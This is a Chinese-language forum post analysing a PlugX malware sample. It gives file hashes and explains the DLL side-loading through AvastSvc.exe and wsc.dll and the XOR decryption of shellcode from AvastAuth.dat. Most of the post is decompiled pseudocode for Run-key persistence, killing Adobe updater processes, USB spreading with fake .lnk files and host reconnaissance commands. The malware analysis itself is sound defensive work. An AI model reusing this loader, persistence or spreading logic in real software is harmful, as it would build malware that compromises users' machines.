PlugX样本分析

Ginobili · 发表于 2022-7-28 17:11

本帖最后由 Ginobili 于 2022-7-28 17:40 编辑

PlugX样本分析

本片文章对PlugX某样本行为进行分析。

样本信息

样本的基本信息

type	hash
SHA256:	00fbfaf36114d3ff9e2c43885341f1c02fade82b49d1cf451bc756d992c84b06
MD5:	c1c9624b21f71e4565b941a37db3815a
SHA1:	1c251974b2e6f110d96af5b23ad036954ba15e4e

解压样本发现样本文件夹内有三个文件，分别是AvastSvc.exe、wsc.dll、AvastAuth.dat。下面对文件逐个进行分析。

AvastSvc.exe

这是一个白文件，程序只有一个start函数，内容是导入wsc.dll，执行其run()函数。

void __noreturn start()
{
  HMODULE v0; // eax@1
  HMODULE v1; // esi@1
  FARPROC v2; // edi@2
  LPWSTR v3; // eax@3
  DWORD v4; // edi@3

  v0 = LoadLibraryW(L"wsc.dll");
  v1 = v0;
  if ( v0 )
  {
    v2 = GetProcAddress(v0, "_run@4");
    if ( v2 )
    {
      v3 = GetCommandLineW();
      v4 = ((int (__stdcall *)(_DWORD))v2)(v3);
      FreeLibrary(v1);
    }
    else
    {
      v4 = GetLastError();
      FreeLibrary(v1);
    }
  }
  else
  {
    v4 = GetLastError();
  }
  ExitProcess(v4);
}

可以看到样本为了躲避检测采取了白+黑的方式进行，这也是许多恶意软件用来躲避检测的常见方式。

wsc.dll

先对dll文件进行静态分析

int sub_10001BF0()
{
  HMODULE v0; // eax@1
  FARPROC v1; // eax@1
  unsigned int i; // [sp+0h] [bp-1ACh]@5
  char v4; // [sp+Bh] [bp-1A1h]@1
  char v5; // [sp+Bh] [bp-1A1h]@3
  char v6; // [sp+Bh] [bp-1A1h]@5
  CHAR String2; // [sp+Ch] [bp-1A0h]@3
  char v8; // [sp+Dh] [bp-19Fh]@3
  int v9; // [sp+4Ch] [bp-160h]@3
  _BYTE *v10; // [sp+50h] [bp-15Ch]@3
  CHAR String1; // [sp+54h] [bp-158h]@1
  char v12; // [sp+55h] [bp-157h]@1
  int v13; // [sp+15Ch] [bp-50h]@3
  unsigned int v14; // [sp+160h] [bp-4Ch]@5
  char v15; // [sp+164h] [bp-48h]@1
  char v16; // [sp+165h] [bp-47h]@1
  char v17; // [sp+166h] [bp-46h]@1
  char v18; // [sp+167h] [bp-45h]@1
  char v19; // [sp+168h] [bp-44h]@1
  char v20; // [sp+169h] [bp-43h]@1
  char v21; // [sp+16Ah] [bp-42h]@1
  char v22; // [sp+16Bh] [bp-41h]@1
  char v23; // [sp+16Ch] [bp-40h]@1
  char v24; // [sp+16Dh] [bp-3Fh]@1
  char v25; // [sp+16Eh] [bp-3Eh]@1
  CHAR ModuleName; // [sp+170h] [bp-3Ch]@1
  char v27; // [sp+171h] [bp-3Bh]@1
  char v28; // [sp+172h] [bp-3Ah]@1
  char v29; // [sp+173h] [bp-39h]@1
  char v30; // [sp+174h] [bp-38h]@1
  char v31; // [sp+175h] [bp-37h]@1
  char v32; // [sp+176h] [bp-36h]@1
  char v33; // [sp+177h] [bp-35h]@1
  char v34; // [sp+178h] [bp-34h]@1
  char v35; // [sp+17Ch] [bp-30h]@3
  int v36; // [sp+17Dh] [bp-2Fh]@3
  int v37; // [sp+184h] [bp-28h]@5
  int v38; // [sp+188h] [bp-24h]@1
  int v39; // [sp+18Ch] [bp-20h]@3
  CHAR ProcName; // [sp+190h] [bp-1Ch]@1
  char v41; // [sp+191h] [bp-1Bh]@1
  char v42; // [sp+192h] [bp-1Ah]@1
  char v43; // [sp+193h] [bp-19h]@1
  char v44; // [sp+194h] [bp-18h]@1
  char v45; // [sp+195h] [bp-17h]@1
  char v46; // [sp+196h] [bp-16h]@1
  char v47; // [sp+197h] [bp-15h]@1
  char v48; // [sp+198h] [bp-14h]@1
  char v49; // [sp+199h] [bp-13h]@1
  char v50; // [sp+19Ah] [bp-12h]@1
  char v51; // [sp+19Bh] [bp-11h]@1
  char v52; // [sp+19Ch] [bp-10h]@1
  char v53; // [sp+19Dh] [bp-Fh]@1
  char v54; // [sp+19Eh] [bp-Eh]@1
  char v55; // [sp+19Fh] [bp-Dh]@1
  char v56; // [sp+1A0h] [bp-Ch]@1
  char v57; // [sp+1A1h] [bp-Bh]@1
  char v58; // [sp+1A2h] [bp-Ah]@1
  _BYTE *v59; // [sp+1A8h] [bp-4h]@1

  v15 = '\\';
  v16 = 'A';
  v17 = 'v';
  v18 = 'a';
  v19 = 's';
  v20 = 't';
  v21 = 'A';
  v22 = 'u';
  v23 = 't';
  v24 = 'h';
  v25 = '\0';
  String1 = '\0';
  sub_10002680(&v12, 0, 0x103u);
  ModuleName = 'k';
  v27 = 'e';
  v28 = 'r';
  v29 = 'n';
  v30 = 'e';
  v31 = 'l';
  v32 = '3';
  v33 = '2';
  v34 = '\0';
  v38 = 9;
  ProcName = 'G';
  v41 = 'e';
  v42 = 't';
  v43 = 'M';
  v44 = 'o';
  v45 = 'd';
  v46 = 'u';
  v47 = 'l';
  v48 = 'e';
  v49 = 'F';
  v50 = 'i';
  v51 = 'l';
  v52 = 'e';
  v53 = 'N';
  v54 = 'a';
  v55 = 'm';
  v56 = 'e';
  v57 = 'A';
  v58 = '\0';
  v0 = GetModuleHandleA(&ModuleName);
  v1 = GetProcAddress(v0, &ProcName);
  (v1)(0, &String1, 260);
  v59 = sub_10002660(&String1, '\\');           // 指向路径
  v4 = -8;
  if ( v59 )
  {
    *v59 = 0;
    v4 = -113;
  }
  v35 = '.';
  v36 = 'tad';
  v38 = 5;
  String2 = 0;
  sub_10002680(&v8, 0, 0x3Fu);
  v9 = sub_10002D40(&v15);
  sub_10002C10(&String2, &v15, v9);
  sub_10002AD0(&String2, &v35, 4u);             // AvastAuth.dat
  lstrcatA(&String1, &String2);
  v10 = 0;
  v39 = 0;
  v13 = 0;
  sub_10001000(&String1, &v39, &v13);           // 打开文件并对文件进行读操作
  v5 = (((((((-38 * ((-26 * (((v4 ^ 0xE5 | 0xF5) ^ 0x4C) >> 4) | 0xCE) + 76) - 34) & 0x6D) - 19) / 39 >> 6) & 0xC9) + 60) ^ 0xCF)
     / 171
     / 101
     / 178
     / 146
     - 14;
  if ( !v13 )
  {
    sub_10002A4D(0);
    v5 &= 0x7Bu;
  }
  v37 = v39;
  v14 = sub_10002D40(v39);
  v13 = v13 - v14 - 1;
  v39 += v14 + 1;
  v10 = LocalAlloc(0x40u, v13 + 1);
  v6 = (((4 * ((((v5 + 19) ^ 0xC4) >> 5) | 0xBA) & 0x34) - 61) >> 6) & 0xCD;// 自解密算法
  for ( i = 0; i < v13; ++i )
  {
    v10[i] = *(i + v39);
    v10[i] ^= *(v37 + i % v14);
    v6 = (v6 ^ 0x3A) / 137;
  }
  return sub_100015D0(v10, v13);                // 获得读写权限
}

函数sub_10001000对.dat文件进行读操作，读取的值作为中间值进行了自解密运算，保存到v10中，最后获取读写操作权限。

下面我们进行动态分析在v10下断点找到shellcode进行提取。这个时候eax保存的值就是shellcode生成的地址，edx存储的是shellcode的长度。二进制复制到010editor上保存文件可以得到shellcode

shellcode

下面对生成的dll行为进行分析，先找到入口函数DllMain()，比较容易的找到关键函数。

int DllMain()
{
  int v0; // eax
  int v2; // [esp+0h] [ebp-18h]
  void *v3; // [esp+4h] [ebp-14h]
  int v4; // [esp+8h] [ebp-10h]
  void *v5; // [esp+Ch] [ebp-Ch]
  int v6; // [esp+10h] [ebp-8h]
  int v7; // [esp+14h] [ebp-4h] BYREF

  unknown_libname_2();
  v7 = 0;
  v0 = exec_GetCommandLineW();                  // 当前进程命令行字符串
  v6 = exec_CommandLineToArgvW(v0, &v7);
  switch ( v7 )
  {
    case 1:
      run_self();                               // 创建三个文件，并设置文件夹自启动
      exec_ExitProcess(0);
      break;
    case 2:
      v5 = sub_1000C3E0();
      v4 = exec_CreateMutexW(0, 0, v5);         // 创建互斥体
      if ( exec_GetLastError() == 0xB7 )
        exec_ExitProcess(0);
      if ( !exec_memcmp(*(v6 + 4), L"-net", 8) )// 第四个参数是-net执行下面操作
      {
        Reg_Network();                          // Control/Network写入注册表值
        run_self();                             // 创建三个文件，并设置文件夹自启动
        exec_ExitProcess(0);
      }
      sub_100153A0();                           // 提权、删除文件、获取计算机基本信息
      sub_100019B0(0);                          // 套接字相关函数，相关注册表值
      exec_CloseHandle(v4);
      break;
    case 3:
      sub_10015400(*(v6 + 4));
      v3 = sub_1000C3E0();
      v2 = exec_CreateMutexW(0, 0, v3);         // 创建互斥体
      if ( exec_GetLastError() != 0xB7 )
      {
        exec_CloseHandle(v2);
        run_self();
      }
      exec_ExitProcess(0);
      break;
  }
  unknown_libname_1();
  return 0;
}

函数经过分析后采取了比较易读的命名方式。下面对关键函数进行依次分析。

在上面的代码中，这个程序要获取当前进程的命令行字符串，使用switch来进行流程的执行。

v7 = 1时执行case 1操作

case1

run_self()函数

int sub_100090E0()
{
  unsigned int v0; // eax
  int len; // eax
  int len_0; // eax
  char v4[520]; // [esp+0h] [ebp-1D68h] BYREF
  wchar_t Ext; // [esp+208h] [ebp-1B60h] BYREF
  char v6[510]; // [esp+20Ah] [ebp-1B5Eh] BYREF
  char v7[520]; // [esp+408h] [ebp-1960h] BYREF
  wchar_t Filename; // [esp+610h] [ebp-1758h] BYREF
  char v9[510]; // [esp+612h] [ebp-1756h] BYREF
  WCHAR v10; // [esp+810h] [ebp-1558h] BYREF
  char v11[518]; // [esp+812h] [ebp-1556h] BYREF
  WCHAR v12; // [esp+A18h] [ebp-1350h] BYREF
  char v13[518]; // [esp+A1Ah] [ebp-134Eh] BYREF
  char v14[520]; // [esp+C20h] [ebp-1148h] BYREF
  char v15[520]; // [esp+E28h] [ebp-F40h] BYREF
  wchar_t Dir; // [esp+1030h] [ebp-D38h] BYREF
  char v17[510]; // [esp+1032h] [ebp-D36h] BYREF
  wchar_t FullPath; // [esp+1230h] [ebp-B38h] BYREF
  char v19[518]; // [esp+1232h] [ebp-B36h] BYREF
  WCHAR v20[260]; // [esp+1438h] [ebp-930h] BYREF
  WCHAR v21; // [esp+1640h] [ebp-728h] BYREF
  char v22[518]; // [esp+1642h] [ebp-726h] BYREF
  char ppath[520]; // [esp+1848h] [ebp-520h] BYREF
  _WORD v24[260]; // [esp+1A50h] [ebp-318h] BYREF
  int v25[12]; // [esp+1C58h] [ebp-110h] BYREF
  __int16 v26; // [esp+1C88h] [ebp-E0h]
  HANDLE hObject; // [esp+1C9Ch] [ebp-CCh] BYREF
  HANDLE v28; // [esp+1CA0h] [ebp-C8h]
  __int16 v29[46]; // [esp+1CACh] [ebp-BCh] BYREF
  __int16 v30[20]; // [esp+1D08h] [ebp-60h] BYREF
  __int16 v31[16]; // [esp+1D30h] [ebp-38h] BYREF
  WCHAR v32; // [esp+1D50h] [ebp-18h] BYREF
  int v33; // [esp+1D52h] [ebp-16h]
  __int16 v34; // [esp+1D56h] [ebp-12h]
  wchar_t Drive; // [esp+1D58h] [ebp-10h] BYREF
  int v36; // [esp+1D5Ah] [ebp-Eh]
  int v37; // [esp+1D60h] [ebp-8h]
  int pName; // [esp+1D64h] [ebp-4h]

  v31[0] = '%';                                 // %userprofile%\\
  v31[1] = 'u';
  v31[2] = 's';
  v31[3] = 'e';
  v31[4] = 'r';
  v31[5] = 'p';
  v31[6] = 'r';
  v31[7] = 'o';
  v31[8] = 'f';
  v31[9] = 'i';
  v31[10] = 'l';
  v31[11] = 'e';
  v31[12] = '%';
  v31[13] = '\\';
  v31[14] = '\0';
  v30[0] = '%';
  v30[1] = 'a';                                 // %allusersprofile%\\
  v30[2] = 'l';                                 // C:\程序数据
  v30[3] = 'l';
  v30[4] = 'u';
  v30[5] = 's';
  v30[6] = 'e';
  v30[7] = 'r';
  v30[8] = 's';
  v30[9] = 'p';
  v30[10] = 'r';
  v30[11] = 'o';
  v30[12] = 'f';
  v30[13] = 'i';
  v30[14] = 'l';
  v30[15] = 'e';
  v30[16] = '%';
  v30[17] = '\\';
  v30[18] = '\0';
  exec_lstrcpyW(v14, v31);
  exec_lstrcpyW(v15, v30);
  pName = sub_1000C320();
  exec_lstrcatW(v14, pName);
  exec_lstrcatW(v15, pName);
  exec_lstrcatW(v14, L"\\");
  exec_lstrcatW(v15, L"\\");
  exec_ExpandEnvironmentStringsW(v15, v24, 520);
  if ( exec_GetFileAttributesW(v24) == -1 && !exec_CreateDirectoryW(v24, 0) )// 创建目录
    exec_ExpandEnvironmentStringsW(v14, v24, 520);
  exec_lstrcpyW(ppath, v24);
  exec_lstrcatW(ppath, L"AvastSvc.exe");
  exec_lstrcpyW(v7, v24);
  exec_lstrcatW(v7, L"wsc.dll");
  exec_lstrcpyW(v4, v24);
  exec_lstrcatW(v4, L"AvastAuth.dat");
  Drive = 0;
  v36 = 0;
  Dir = 0;
  memset(v17, 0, sizeof(v17));
  Filename = 0;
  memset(v9, 0, sizeof(v9));
  Ext = 0;
  memset(v6, 0, sizeof(v6));
  v21 = 0;
  memset(v22, 0, sizeof(v22));
  FullPath = 0;
  memset(v19, 0, sizeof(v19));
  v10 = 0;
  memset(v11, 0, sizeof(v11));
  v12 = 0;
  memset(v13, 0, sizeof(v13));
  exec_GetModuleFileNameW(0, &FullPath, 520);
  _wsplitpath_s(&FullPath, &Drive, 3u, &Dir, 0x100u, &Filename, 0x100u, &Ext, 0x100u);
  wsprintfW(&v21, L"%s%s", &Drive, &Dir);
  wsprintfW(&v10, L"%s%s", &v21, L"wsc.dll");
  wsprintfW(&v12, L"%s%s", &v21, L"AvastAuth.dat");
  sub_10007380(v24);
  exec_SetFileAttributesW(v24, 2);
  exec_SetFileAttributesW(v24, 2);
  exec_CopyFileW(&FullPath, ppath, 0);          // 创建文件AvastSvc.exe、wsc.dll、AvastAuth.dat
  exec_CopyFileW(&v10, v7, 0);
  exec_CopyFileW(&v12, v4, 0);
  v0 = exec_GetSystemTimeAsFileTime(0);         // 检索当前日期和时间
  srand(v0);
  v37 = rand() % 899 + 100;
  wsprintfW(v20, L"\"%s\" %d", ppath, v37);
  v29[0] = 'S';
  v29[1] = 'o';
  v29[2] = 'f';
  v29[3] = 't';
  v29[4] = 'w';
  v29[5] = 'a';
  v29[6] = 'r';
  v29[7] = 'e';
  v29[8] = '\\';
  v29[9] = 'M';
  v29[10] = 'i';
  v29[11] = 'c';
  v29[12] = 'r';
  v29[13] = 'o';
  v29[14] = 's';
  v29[15] = 'o';
  v29[16] = 'f';
  v29[17] = 't';
  v29[18] = '\\';
  v29[19] = 'W';
  v29[20] = 'i';
  v29[21] = 'n';
  v29[22] = 'd';
  v29[23] = 'o';
  v29[24] = 'w';
  v29[25] = 's';
  v29[26] = '\\';
  v29[27] = 'C';
  v29[28] = 'u';
  v29[29] = 'r';
  v29[30] = 'r';
  v29[31] = 'e';
  v29[32] = 'n';
  v29[33] = 't';
  v29[34] = 'V';
  v29[35] = 'e';
  v29[36] = 'r';
  v29[37] = 's';
  v29[38] = 'i';
  v29[39] = 'o';
  v29[40] = 'n';
  v29[41] = '\\';
  v29[42] = 'R';
  v29[43] = 'u';
  v29[44] = 'n';
  v29[45] = '\0';
  len = exec_lstrlenW(v20);
  exec_RegCreate_SetKeyExW(0x80000002, v29, pName, v20, 2 * len + 2, 1);// HKEY_CURRENT_USER 0x80000001/打开注册表项并为文件创建键值（自启动）
  len_0 = exec_lstrlenW(v20);
  exec_RegCreate_SetKeyExW(0x80000001, v29, pName, v20, 2 * len_0 + 2, 1);// HKEY_LOCAL_MACHINE          0x80000002
  v32 = 0;
  v33 = 0;
  v34 = 0;
  wsprintfW(&v32, L" %d", v37);
  exec_lstrcatW(ppath, &v32);                   // 拼接路径
  exec_memset(&hObject, 0, '\x10');
  exec_memset(v25, 0, 0x44);
  v25[0] = 0x44;
  v25[11] = '\x01';
  v26 = 1;
  if ( exec_CreateProcessW(0, ppath, 0, 0, 0, 4, 0, 0, v25, &hObject) )// 为AvastSvc.exe创建进程
  {
    exec_ResumeThread(v28);
    CloseHandle(hObject);
    CloseHandle(v28);
  }
  return 0;
}

这段代码先指向C:\程序数据，创建一个文件夹，然后将三个程序wsc.dll、AvastSvc.exe、AvastAuth.dat复制到文件夹内。后对文件夹内的三个文件设置注册表的HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \Windows \ CurrentVersion \ Run键值进行自启动设置，最后创建AvastSvc.exe进程。

执行case2操作流程：先创建一个互斥体，拿命令行第四个参数与“-net”字符串进行比较，不相同则执行Reg_Network()函数。而Reg_Network()函数功能是将注册表HKEY_LOCAL_MACHINE \ SYSTEM \ ControlSet001 \Control \ Network\Version置1，后面同样执行run_self()，再往后执行sub_100153A0()函数。

case2

sub_100153A0()

int sub_100153A0()
{
  int v1; // [esp+0h] [ebp-8h] BYREF
  int v2; // [esp+4h] [ebp-4h]

  sub_10015600();                               // 遍历进程,打开进程设置自启动
  v1 = 0;
  v2 = exec_CreateThread(0, 0, sub_10014E10, 0, 0, &v1);// 创建线程
  if ( v2 )
  {
    exec_CloseHandle(v2);
    v2 = 0;
  }
  return 0;
}

其中sub_10015600()函数如下

sub_10015600()

int sub_10015600()
{
  wchar_t v1[18]; // [esp+8h] [ebp-E4h] BYREF
  wchar_t v2[16]; // [esp+2Ch] [ebp-C0h] BYREF
  wchar_t v3[16]; // [esp+4Ch] [ebp-A0h] BYREF
  wchar_t SubStr[16]; // [esp+6Ch] [ebp-80h] BYREF
  wchar_t v5[16]; // [esp+8Ch] [ebp-60h] BYREF
  wchar_t v6[14]; // [esp+ACh] [ebp-40h] BYREF
  __int16 v7[18]; // [esp+C8h] [ebp-24h] BYREF

  SubStr[0] = 'A';                              // AdobeHelper.exe
  SubStr[1] = 'd';
  SubStr[2] = 'o';
  SubStr[3] = 'b';
  SubStr[4] = 'e';
  SubStr[5] = 'H';
  SubStr[6] = 'e';
  SubStr[7] = 'l';
  SubStr[8] = 'p';
  SubStr[9] = 'e';
  SubStr[10] = 'r';
  SubStr[11] = '.';
  SubStr[12] = 'e';
  SubStr[13] = 'x';
  SubStr[14] = 'e';
  SubStr[15] = '\0';
  v1[0] = 'A';                                  // AdobeUpdates.exe
  v1[1] = 'd';
  v1[2] = 'o';
  v1[3] = 'b';
  v1[4] = 'e';
  v1[5] = 'U';
  v1[6] = 'p';
  v1[7] = 'd';
  v1[8] = 'a';
  v1[9] = 't';
  v1[10] = 'e';
  v1[11] = 's';
  v1[12] = '.';
  v1[13] = 'e';
  v1[14] = 'x';
  v1[15] = 'e';
  v1[16] = '\0';
  v2[0] = 'A';
  v2[1] = 'd';
  v2[2] = 'o';
  v2[3] = 'b';
  v2[4] = 'e';
  v2[5] = 'U';
  v2[6] = 'p';
  v2[7] = 'd';
  v2[8] = 'a';
  v2[9] = 't';
  v2[10] = 'e';
  v2[11] = '.';
  v2[12] = 'e';
  v2[13] = 'x';
  v2[14] = 'e';
  v2[15] = '\0';
  v6[0] = 'A';
  v6[1] = 'd';
  v6[2] = 'o';
  v6[3] = 'b';
  v6[4] = 'e';
  v6[5] = 'A';
  v6[6] = 'R';
  v6[7] = 'M';
  v6[8] = '.';
  v6[9] = 'e';
  v6[10] = 'x';
  v6[11] = 'e';
  v6[12] = '\0';
  v5[0] = 'A';
  v5[1] = 'A';
  v5[2] = 'M';
  v5[3] = ' ';
  v5[4] = 'U';
  v5[5] = 'p';
  v5[6] = 'd';
  v5[7] = 'a';
  v5[8] = 't';
  v5[9] = 'e';
  v5[10] = '.';
  v5[11] = 'e';
  v5[12] = 'x';
  v5[13] = 'e';
  v5[14] = '\0';
  v3[0] = 'A';
  v3[1] = 'A';
  v3[2] = 'M';
  v3[3] = ' ';
  v3[4] = 'U';
  v3[5] = 'p';
  v3[6] = 'd';
  v3[7] = 'a';
  v3[8] = 't';
  v3[9] = 'e';
  v3[10] = 's';
  v3[11] = '.';
  v3[12] = 'e';
  v3[13] = 'x';
  v3[14] = 'e';
  v3[15] = '\0';
  v7[0] = 'S';                                  // SeDebugprivilege
  v7[1] = 'e';
  v7[2] = 'D';
  v7[3] = 'e';
  v7[4] = 'b';
  v7[5] = 'u';
  v7[6] = 'g';
  v7[7] = 'P';
  v7[8] = 'r';
  v7[9] = 'i';
  v7[10] = 'v';
  v7[11] = 'i';
  v7[12] = 'l';
  v7[13] = 'e';
  v7[14] = 'g';
  v7[15] = 'e';
  v7[16] = 0;
  sub_100072B0(v7, 1);                          // 指定写相关的访问权的OpenProcess操作
  sub_100133D0(SubStr);                         // 遍历进程找到AdobeHelper.exe,关闭进程。打开进程删除注册表项
  sub_100133D0(v1);                             // AdobeUpdates.exe
  sub_100133D0(v2);
  sub_100133D0(v6);
  sub_100133D0(v5);
  sub_100133D0(v3);
  return sub_100072B0(v7, 0);
}

函数将AdobeHelper.exe、AdobeUpdates.exe、 AdobeUpdate.exe、AdobeARM.exe、AM Update.exe、AAM Updates.exe字符串传入sub_100133D0()函数，sub_100072B0()的功能是获得文件的写访问权。而sub_100133D0()的内容是关闭进程、遍历磁盘删除文件、删除启动项。

回到sub_100153A0()函数，后面创建了一个线程，为函数sub_10014E10()

sub_10014E10()

void __stdcall sub_10014E10(int a1)
{
  int v1; // eax
  __int16 lpBuffer; // [esp+0h] [ebp-430h] BYREF
  char v3[518]; // [esp+2h] [ebp-42Eh] BYREF
  wchar_t pFilePath; // [esp+208h] [ebp-228h] BYREF
  char v5[518]; // [esp+20Ah] [ebp-226h] BYREF
  int v6; // [esp+410h] [ebp-20h]
  int v7; // [esp+414h] [ebp-1Ch] BYREF
  int v8; // [esp+418h] [ebp-18h] BYREF
  wchar_t *v9; // [esp+41Ch] [ebp-14h]
  int v10; // [esp+420h] [ebp-10h]
  int v11; // [esp+424h] [ebp-Ch]
  int v12; // [esp+428h] [ebp-8h]
  __int16 *v13; // [esp+42Ch] [ebp-4h]

  exec_SetErrorMode(1);
  v10 = 0;
  lpBuffer = 0;
  memset(v3, 0, sizeof(v3));
  pFilePath = 0;
  memset(v5, 0, sizeof(v5));
  v13 = 0;
  while ( 1 )
  {
    exec_memset(&lpBuffer, 0, 8);
    exec_GetLogicalDriveStringsW(520, &lpBuffer);// 用指定系统中有效驱动器的字符串填充缓冲区。
    v13 = &lpBuffer;
    v6 = 1;
    while ( *v13 )                              // 驱动中的每个文件夹都复制自身
    {
      exec_memset(&pFilePath, 0, 8);
      exec_lstrcpyW(&pFilePath, L"\\\\.\\");    // 匹配所有驱动器文件
      exec_lstrcatW(&pFilePath, v13);           // 所有驱动器
      v9 = exec_wcsrchr(&pFilePath, '\\');
      *v9 = 0;
      v10 = CreateFile_0(&pFilePath);           // 创建文件
      if ( v10 == 1 )
      {
        v8 = 0;
        v7 = 0;
        v12 = exec_CreateThread(0, 0, sub_100151E0, &pFilePath, 0, &v8);// 创建线程  互斥体、超级隐藏文件
        if ( v12 )
        {
          exec_CloseHandle(v12);
          v12 = 0;
        }
        exec_Sleep(100);
        v11 = exec_CreateThread(0, 0, sub_10015030, &pFilePath, 0, &v7);// 创建线程
        if ( v11 )
        {
          exec_CloseHandle(v11);
          v11 = 0;
        }
        exec_Sleep(1000);
      }
      v1 = exec_lstrlenW(v13);
      v13 += v1 + 1;
    }
    exec_Sleep(30000);
  }
}

函数创建了两个线程，在创建线程之前函数对整个磁盘进行遍历，并打开磁盘，之后在打开的磁盘中创建两个线程sub_100151E0()与sub_10015030()

sub_100151E0()

int __stdcall sub_100151E0(_WORD *a1)
{
  WCHAR v2; // [esp+0h] [ebp-430h] BYREF
  char v3[518]; // [esp+2h] [ebp-42Eh] BYREF
  wchar_t SysId; // [esp+208h] [ebp-228h] BYREF
  char v5[518]; // [esp+20Ah] [ebp-226h] BYREF
  int v6; // [esp+410h] [ebp-20h]
  wchar_t *v7; // [esp+414h] [ebp-1Ch]
  int v8; // [esp+418h] [ebp-18h] BYREF
  WCHAR pFileName; // [esp+41Ch] [ebp-14h] BYREF
  int v10; // [esp+41Eh] [ebp-12h]
  int v11; // [esp+422h] [ebp-Eh]
  __int16 v12; // [esp+426h] [ebp-Ah]
  _WORD *v13; // [esp+428h] [ebp-8h]
  int v14; // [esp+42Ch] [ebp-4h]

  exec_SetErrorMode(1);
  v13 = a1;
  pFileName = 0;
  v10 = 0;
  v11 = 0;
  v12 = 0;
  if ( *a1 == '\\' && v13[1] == '\\' )
    wsprintfW(&pFileName, L"%c:\\", v13[4]);
  else
    wsprintfW(&pFileName, L"%ws", v13);
  v2 = 0;
  memset(v3, 0, sizeof(v3));
  SysId = 0;
  memset(v5, 0, sizeof(v5));
  exec_lstrcpyW(&SysId, &pFileName);
  v7 = exec_wcsrchr(&SysId, ':');
  *v7 = 0;
  wsprintfW(&v2, L"USB_NOTIFY_INF_%ws", &SysId);
  v14 = exec_CreateMutexW(0, 0, &v2);           // 为驱动创建互斥体
  if ( exec_GetLastError() != 0xB7 )
  {
    v8 = 0;
    v6 = exec_CreateThread(0, 0, sub_10013ED0, 0, 0, &v8);// 创建线程，设置隐藏文件注册表项
    while ( sub_10015E00(&pFileName) != 2 )     // 查看网络连接。在驱动器中复制自身，并且创建伪装快捷方式文件.lnk   在回收站创建CEFHelper.exe文件
      exec_Sleep(60000);
  }
  exec_ReleaseMutex(v14);
  exec_CloseHandle(v14);
  return 0;
}

函数进入每个驱动器之后创建互斥体USB_NOTIFY_INF_然后创建线程，设置隐藏注册表项。在while内部的sub_10015E00()函数查看网络连接、在驱动器中复制自身，并且创建伪装快捷方式文件.lnk 在回收站创建CEFHelper.exe文件，最后释放互斥体。

sub_10015030()

int __stdcall sub_10015030(_WORD *a1)
{
  LPCWSTR v2; // [esp+0h] [ebp-428h] BYREF
  DWORD v3; // [esp+4h] [ebp-424h]
  DWORD v4; // [esp+8h] [ebp-420h]
  wchar_t SysId; // [esp+208h] [ebp-220h] BYREF
  char v6[518]; // [esp+20Ah] [ebp-21Eh] BYREF
  wchar_t *v7; // [esp+410h] [ebp-18h]
  WCHAR pFilePath; // [esp+414h] [ebp-14h] BYREF
  int v9; // [esp+416h] [ebp-12h]
  int v10; // [esp+41Ah] [ebp-Eh]
  __int16 v11; // [esp+41Eh] [ebp-Ah]
  _WORD *v12; // [esp+420h] [ebp-8h]
  int v13; // [esp+424h] [ebp-4h]

  exec_SetErrorMode(1);
  v12 = a1;
  pFilePath = 0;
  v9 = 0;
  v10 = 0;
  v11 = 0;
  if ( *a1 == '\\' && v12[1] == '\\' )
    wsprintfW(&pFilePath, L"%c:\\", v12[4]);
  else
    wsprintfW(&pFilePath, L"%ws", v12);
  LOWORD(v2) = 0;
  memset(&v2 + 2, 0, 0x206u);
  SysId = 0;
  memset(v6, 0, sizeof(v6));
  exec_lstrcpyW(&SysId, &pFilePath);
  v7 = exec_wcsrchr(&SysId, ':');
  *v7 = 0;
  wsprintfW(&v2, L"USB_NOTIFY_COP_%ws", &SysId);// 为驱动创建互斥锁
  v13 = exec_CreateMutexW(0, 0, &v2);
  if ( exec_GetLastError() == 0xB7 )
  {
    exec_ReleaseMutex(v13);
    exec_CloseHandle(v13);
    v13 = 0;
    return 0;
  }
  if ( InternetCheckConnectionW_0(v2, v3, v4) ) // 检查网络连接https://www.microsoft.com
  {
    sub_10010600(&pFilePath);                   // 将指定文件base64加密传到垃圾桶
  }
  else
  {
    if ( !sub_10012E60() )                      // 设置Network注册表
      return 0;
    sub_10010BA0(&pFilePath);                   // 设置清空回收站注册表项，创建一个进程使用某些shell获取计算机的基本信息
    sub_100123C0(&pFilePath);
  }
  exec_ReleaseMutex(v13);
  exec_CloseHandle(v13);
  return 0;
}

同上，创建一个互斥锁，检查网络连接https://www.microsoft.com ，连接正常则将某些指定格式的文件进行base64加密并传入回收站中。后面设置Network的注册表为1，sub_10010BA0()函数设置清空回收站注册表项，创建一个进程使用某些shell获取计算机的基本信息（ipconfig /all netstat -ano arp -a tasklist /v systeminfo）并且将文件tc3lzLmluZm8放入回收站将tmp.bat删除，并且创建进程。

回到主函数,sub_100019B0是套接字相关函数，如下

int __stdcall sub_100019B0(int a1)
{
  __int16 v2[18]; // [esp+0h] [ebp-64h] BYREF
  __int16 v3[16]; // [esp+24h] [ebp-40h] BYREF
  int v4; // [esp+44h] [ebp-20h]
  int v5; // [esp+48h] [ebp-1Ch]
  int v6; // [esp+4Ch] [ebp-18h]
  int v7; // [esp+50h] [ebp-14h]
  int v8; // [esp+54h] [ebp-10h]
  int v9; // [esp+58h] [ebp-Ch]
  int v10; // [esp+5Ch] [ebp-8h]
  char v11[4]; // [esp+60h] [ebp-4h] BYREF

  sub_1000F960();
  v2[0] = 'S';
  v2[1] = 'e';
  v2[2] = 'D';
  v2[3] = 'e';
  v2[4] = 'b';
  v2[5] = 'u';
  v2[6] = 'g';
  v2[7] = 'P';
  v2[8] = 'r';
  v2[9] = 'i';
  v2[10] = 'v';
  v2[11] = 'i';
  v2[12] = 'l';
  v2[13] = 'e';
  v2[14] = 'g';
  v2[15] = 'e';
  v2[16] = 0;
  v10 = sub_100072B0(v2, 1);                    // 提权
  v3[0] = 'S';                                  // SeTcbprivilege
  v3[1] = 'e';
  v3[2] = 'T';
  v3[3] = 'c';
  v3[4] = 'b';
  v3[5] = 'P';
  v3[6] = 'r';
  v3[7] = 'i';
  v3[8] = 'v';
  v3[9] = 'i';
  v3[10] = 'l';
  v3[11] = 'e';
  v3[12] = 'g';
  v3[13] = 'e';
  v3[14] = 0;
  v9 = sub_100072B0(v3, 1);                     // 提权
  v8 = sub_10009AE0();                          // 创建线程，设置注册表值，创建套接字
  unknown_libname_3(v11);
  v7 = sub_100164D0(v11);                       // 窗口
  v6 = sub_100165A0(v11);                       // 消息
  v5 = sub_100164A0(v11);                       // Destroy
  sub_10001850(dword_10028CEC);
  sub_1000A210();
  sub_1000EE80();                               // WSACleanup
  v4 = 0;
  unknown_libname_4(v11);
  return v4;
}

